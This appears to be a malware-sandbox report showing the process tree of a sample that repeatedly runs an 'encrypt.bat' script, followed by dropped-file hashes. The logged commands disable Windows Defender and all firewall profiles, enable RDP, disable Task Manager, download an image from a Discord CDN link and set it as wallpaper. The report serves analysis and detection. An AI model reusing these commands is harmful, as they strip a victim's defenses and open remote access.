C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"74⤵PID:4404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"74⤵PID:2820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"74⤵PID:3192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"74⤵PID:96
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable74⤵
- Modifies Windows Firewall
PID:1120
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE74⤵PID:1600
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off74⤵PID:2120
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off74⤵PID:920
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off74⤵PID:4048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off74⤵PID:2640
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off74⤵PID:204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"74⤵PID:3608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"74⤵PID:4216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"74⤵PID:4728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"74⤵PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"74⤵PID:4148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"74⤵PID:1040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"74⤵
- Blocklisted process makes network request
PID:4708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"74⤵
- Command and Scripting Interpreter: PowerShell
PID:4940 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"75⤵PID:2892
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"76⤵PID:648
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f76⤵PID:2612
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"76⤵PID:96
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f76⤵PID:744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"76⤵PID:3144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"76⤵PID:2744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"76⤵PID:4768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"76⤵PID:1896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"76⤵PID:2452
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable76⤵PID:4048
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE76⤵PID:2960
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off76⤵PID:1888
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off76⤵PID:600
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off76⤵PID:1652
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off76⤵PID:2964
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off76⤵PID:920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"76⤵PID:1692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"76⤵PID:2896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"76⤵PID:2520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"76⤵PID:96
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"76⤵PID:516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"76⤵PID:1004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"76⤵
- Blocklisted process makes network request
PID:3472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"76⤵PID:2264
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"77⤵PID:4340
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"78⤵PID:440
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f78⤵PID:3636
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"78⤵PID:824
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f78⤵PID:996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"78⤵PID:2992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"78⤵PID:3844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"78⤵PID:1388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"78⤵PID:4760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"78⤵PID:4424
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable78⤵PID:2344
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE78⤵PID:2616
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f76⤵PID:3160
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters76⤵PID:804
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f74⤵
- Sets desktop wallpaper using registry
PID:2956
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters74⤵PID:488
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f72⤵
- Sets desktop wallpaper using registry
PID:5008
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters72⤵PID:1912
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f70⤵PID:4548
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters70⤵PID:2276
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f68⤵
- Sets desktop wallpaper using registry
PID:2708
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters68⤵PID:4604
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f66⤵
- Sets desktop wallpaper using registry
PID:744
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters66⤵PID:1076
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f64⤵PID:96
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters64⤵PID:4340
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f62⤵PID:2452
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters62⤵PID:2120
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f60⤵
- Sets desktop wallpaper using registry
PID:2572
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters60⤵PID:3676
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f58⤵
- Sets desktop wallpaper using registry
PID:2216
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters58⤵PID:1660
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f56⤵
- Sets desktop wallpaper using registry
PID:4392
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters56⤵PID:1944
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f54⤵PID:2988
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters54⤵PID:1348
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f52⤵
- Sets desktop wallpaper using registry
PID:4760
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters52⤵PID:3680
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f50⤵PID:4732
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters50⤵PID:1948
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f48⤵PID:4116
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters48⤵PID:360
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f46⤵
- Sets desktop wallpaper using registry
PID:1844
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters46⤵PID:4580
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f44⤵
- Sets desktop wallpaper using registry
PID:1928
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters44⤵PID:2960
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f42⤵PID:1708
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters42⤵PID:2520
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f40⤵PID:1148
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters40⤵PID:2268
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f38⤵
- Sets desktop wallpaper using registry
PID:1844
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters38⤵PID:4640
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f36⤵PID:3064
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters36⤵PID:4452
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f34⤵
- Sets desktop wallpaper using registry
PID:1760
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters34⤵PID:2556
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f32⤵
- Sets desktop wallpaper using registry
PID:4536
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters32⤵PID:164
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f30⤵PID:3128
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters30⤵PID:704
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f28⤵
- Sets desktop wallpaper using registry
PID:3472
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters28⤵PID:4160
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f26⤵
- Sets desktop wallpaper using registry
PID:2936
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters26⤵PID:1564
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f24⤵PID:4856
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters24⤵PID:1844
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f22⤵PID:1276
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters22⤵PID:4336
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f20⤵
- Sets desktop wallpaper using registry
PID:1104
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters20⤵PID:3440
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f18⤵
- Sets desktop wallpaper using registry
PID:700
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters18⤵PID:1348
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f16⤵
- Sets desktop wallpaper using registry
PID:2732
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters16⤵PID:4688
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f14⤵
- Sets desktop wallpaper using registry
PID:3192
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters14⤵PID:4436
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f12⤵
- Sets desktop wallpaper using registry
PID:488
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters12⤵PID:3156
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f10⤵PID:4740
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters10⤵PID:1104
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f8⤵
- Sets desktop wallpaper using registry
PID:4532
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters8⤵PID:2940
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f6⤵PID:4012
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters6⤵PID:4732
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f4⤵
- Sets desktop wallpaper using registry
PID:4532
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:4152
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4676
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:2280
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3356
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2332
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4684
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:2748
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD559094544993f4727a85d62f55ea66f17
SHA139a125f1d71b596e57d14c2865626b95825f1053
SHA2569b70930727653b6b647554cf3bd508fe9ba4981aaebcbeed91f7270653d679ca
SHA51248f15e70f9e800533e3869b527d4cae504ef04a2fea38c9aa1f2bb541fd1fa559979a6b7e802da067b52a98202387fd5b9023dfa09f85d67c8c7b759f73a4774
-
Filesize
1KB
MD560722a327960e4b4f5d967101a72ed06
SHA104109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e
SHA2563441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd
SHA51298812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
74KB
MD5d4fc49dc14f63895d997fa4940f24378
SHA13efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a
-
Filesize
1KB
MD570684e7eab5dac8c9e5f3dca5a7e2bbb
SHA13c5f35a7379c0f6c5372c2aa08f17baaae6e8afb
SHA256e074164e1fad648dba038b26db9b7fb39d0ef8a6d573006becc0054d7c5c8cf5
SHA512756b1c5cfe23aad69b706e8e9859e885840e54e9a0edfc2c5506c4f755dc9e7f631a5cfd3c76aeda5d978c692fa14f99c0c3868cc4c1a35368f371badb0c92a2
-
Filesize
1KB
MD56435bc60821b951154f9a145ec43c127
SHA18d22626e7631a1a109d997f9a254320a193d2154
SHA256c008ed82416cefd9eceaa30fd87d6c52fb9cd87a9e3642e7e125b43dc7343907
SHA512d3d06252eb54d85cdee12a82f6ab93666c03ba57a6c0c56ab78130efd103a6c2fa53f950df7b9a7736c2fbd01a722287cf1d088c5bb196d1b4818320fda737ae
-
Filesize
1KB
MD5d2b71f47151696c71f8ba7a0e04c9d35
SHA12330e0b2cef20d848ad3eb907c3879e08aa11cd1
SHA2567070df91b97b0cf9c9120689ea6b564212d6982b4f2d7c51cf1b2f69724bd6f7
SHA51201ff97ded497f96aa70ce6edb269e707c49d1bff01502301f10af1eb7477ec0ac1fb59fec7dd52c45eeea563c41f323c666695c790f22855be8fd20853ee3d32
-
Filesize
1KB
MD582564ae0024514f6cb5f4aa7dcf9a61a
SHA16f7cd76bbe095ec0f912713415c866f62158e503
SHA25647d533a6d2c407f1aa44f365044558aedaa90cd6aea52a34b7ae93c6edc82ba3
SHA512574fdcc0b66f3bd8f2373ed47c23921e51b2160177ae0b4539749046c5b77f0e93a5e3f9b51848455cc04446848d688b4b2e104bc2ca902f211c6847168bfa0c
-
Filesize
1KB
MD541f60bf3f23efdae880fa7f431c6757e
SHA1fb1b231d5fa4e4ddd6e2bc5615f6d2d9375db280
SHA2565e1b8958cb664231c74da06acc7202c78aa2d617e9de14cce6a7d7a7b736402b
SHA5128caa90ac514e9326bc28cc50f9b7b7e4dbd6760d5d2850929eecaf6b95c43433d7e4d24fb394dcd57a79541c5d495b09167d415c675ae181ee14d0e8ffbea514
-
Filesize
1KB
MD54d6b6a66cf7696e3e1ff4a9542c8ce95
SHA1648af552b13f79eb6dca773f99c74cc842766693
SHA2566b1b5d528a7496c7d0ea5987f5ff09d85a45549dcb0f6ddff6709c803d55d978
SHA512996b7caf7867fb92450b452de917e39882afc6d2ad9eaf1e4d73898866bb79dcac688717d12a8f67cde6557d39c8cd96824cc393b95be0f879c8d24ecaaa49b4
-
Filesize
1KB
MD55eaff73aa42a3b443c5327114ae6328f
SHA17ca8bcbf27676ec604e19aaecb237967060dd793
SHA2566e43d778b27c2e66941dfa8664f57aee0cc043eb98fc410195cdbb63a4a85844
SHA51222b9351b9a8c06722a7624914becb933a570492a441ab32e5656dc1a8d4eb021e87055936fc61acb040ab487262ce4ad7fb24f7a98fe1720fd12533f460eeeae
-
Filesize
1KB
MD50e252ef8654c077ae95c3b29cfa91ad8
SHA1629d499fc67e1b0f7deff6509923624e472a4891
SHA2567b5995e1c2d5a266d38d1d1b2d5f85818db60f2961a893f09512dd2931357981
SHA512d2c38f14db7b6a162cf1c907ea56c262030528230c51a4474f76fc48d844a21768af554144943f19cfc338dd91cfd0022eb56a4c7fb626f6bc18820547ba3bf2
-
Filesize
1KB
MD54bc43c64498ec6deb14ee893123fec1c
SHA148bc4f409689d5f01c094f300b10bb559a3140ac
SHA256d3dc8b4a4c0f1e539d597fa53e1c0cc9c09f85433b0cf28282a254946e45124e
SHA51227dcab11a05f8a1d7b45b1e641fa958f70d2017ed5db3190bffad5c227ecc2388ab2005eedae45cd39ec189a33a1a61f30c37ecc21dc1701dd93590ccc1d3455
-
Filesize
1KB
MD5eb74a117bd937770897e0f0d5ebf86e6
SHA1fa8a672129246fd99da8fcc30fd6ab0a4f5af5be
SHA2561a38a786ea073f83b07e886743a74d526c3585986607531cf5bec2b7522a465e
SHA51295f640c2c91e62b574257618338a8d35c10109d4a3f9ae27cbca68d7ce44ace37481d87f17fb8bc84dab8083c2ac6e9fa4972c5988d78b2f73c0f217c6444436
-
Filesize
1KB
MD50cfd021e0b919e5f81eb1a31f58ea3f4
SHA1849ba8825e1698f7221a8e67152d743e6efec49b
SHA256301fae8d1dd7d8e00096622a322ef476a9a97ff5cf5fd1c0bc631707edec7d89
SHA51237c90e1e2c5c15004436660c331a209ef395ccb9437727aa7b4ff51565722317dd368f11b5a6eb43c01c3e64b4041c47745f6785d35fdd72903aa6d8d0422bbf
-
Filesize
1KB
MD53b04aec6497684b6952474b9a5bb3943
SHA1783634978a928ab8cccb4b948d153ae1fde9527d
SHA2560a599a87ea9d49734a19814cf1734816fec80ac1751c9fa0ee1d3b1cba2d40b3
